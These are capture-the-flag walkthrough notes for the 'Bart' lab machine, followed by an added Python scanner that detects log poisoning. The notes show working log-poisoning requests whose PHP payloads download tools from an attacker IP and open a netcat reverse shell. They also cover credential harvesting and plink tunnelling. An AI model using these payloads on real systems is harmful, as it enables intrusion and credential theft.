- Get nc64 to the box and then execute it. Then upload plink.exe to the box to create a tunnel afterwards.
- I guess you are fine with this. Just make sure you upload 64.exe
GET /log/log.php?username=harvey&filename=log.php HTTP/1.1
Host: internal-01.bart.htb
User-Agent: <?php echo exec("powershell -command \"(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.235:8000/nc64.exe','nc64.exe')\""); ?>Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=909guak9i2v1m8snmgqs1c1jb9
Connection: close
Upgrade-Insecure-Requests: 1

GET /log/log.php?username=harvey&filename=log.php HTTP/1.1
Host: internal-01.bart.htb
User-Agent: <?php exec("nc64.exe 10.10.14.235 9999 -e cmd.exe"); ?>Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=909guak9i2v1m8snmgqs1c1jb9
Connection: close
Upgrade-Insecure-Requests: 1

GET /log/log.php?username=harvey&filename=log.php HTTP/1.1
Host: internal-01.bart.htb
User-Agent: <?php echo exec("powershell -command \"(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.235:8000/plink.exe','plink.exe')\""); ?>Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=909guak9i2v1m8snmgqs1c1jb9
Connection: close
Upgrade-Insecure-Requests: 1
- Then, inside the nc64.exe shell on bart, run the winlogon query.
- Get the creds.
- Then use plink to create a tunnel. SSH must be running on Kali.
- echo y|plink.exe -l root -pw <ssh-password> <kali-ip> -R <kali-port>:127.0.0.1:<windows-port>
- Example:
- echo y|plink.exe -l root -pw mypassword 10.10.15.88 -R 5555:127.0.0.1:445
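Added here as a defender-side example, not part of the original paste: a small Python scanner that flags the two traces the requests above leave in a web server's access log, a PHP open tag in the User-Agent or Referer header and a request that points the log.php filename parameter at a .php file. The log lines it runs over are constructed to mirror those requests; the combined log format and the field names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache/nginx "combined" log format (assumed); the User-Agent is the last
# quoted field and may itself contain escaped quotes, so it is captured greedily.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>.*)"$'
)
PHP_TAG_RE = re.compile(r'<\?(php|=)', re.IGNORECASE)

# Constructed sample lines mirroring the requests above (not a real capture).
SAMPLE_LOG = r'''10.10.14.235 - - [01/Jan/2024:10:00:00 +0000] "GET /log/log.php?username=harvey&filename=log.php HTTP/1.1" 200 512 "-" "<?php echo exec(\"powershell -command ...\"); ?>Mozilla/5.0"
10.10.14.235 - - [01/Jan/2024:10:00:05 +0000] "GET /log/log.php?username=harvey&filename=log.php HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.10.14.1 - - [01/Jan/2024:10:01:00 +0000] "GET /log/log.php?username=harvey&filename=log.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0)"'''


def findings_for(entry: dict) -> list:
    """Return the names of the log-poisoning indicators present in one parsed entry."""
    hits = []
    # 1. PHP code smuggled into a header that the application writes to disk.
    if PHP_TAG_RE.search(entry["ua"]) or PHP_TAG_RE.search(entry["referer"]):
        hits.append("php_tag_in_header")
    # 2. The logging endpoint is told to write its log into a .php file, which
    #    is what turns header contents into executable code on the next include.
    qs = parse_qs(urlsplit(entry["target"]).query)
    for name in qs.get("filename", []):
        if name.lower().endswith(".php"):
            hits.append("log_written_as_php")
            break
    return hits


def analyze_log(text: str) -> list:
    """Parse combined-format log text; return (line_no, ip, findings) for flagged lines."""
    flagged = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        m = COMBINED_RE.match(raw)
        if not m:
            continue  # skip unparseable lines rather than silently trusting them
        hits = findings_for(m.groupdict())
        if hits:
            flagged.append((line_no, m.group("ip"), hits))
    return flagged


if __name__ == "__main__":
    for line_no, ip, hits in analyze_log(SAMPLE_LOG):
        print(f"line {line_no} from {ip}: {', '.join(hits)}")
```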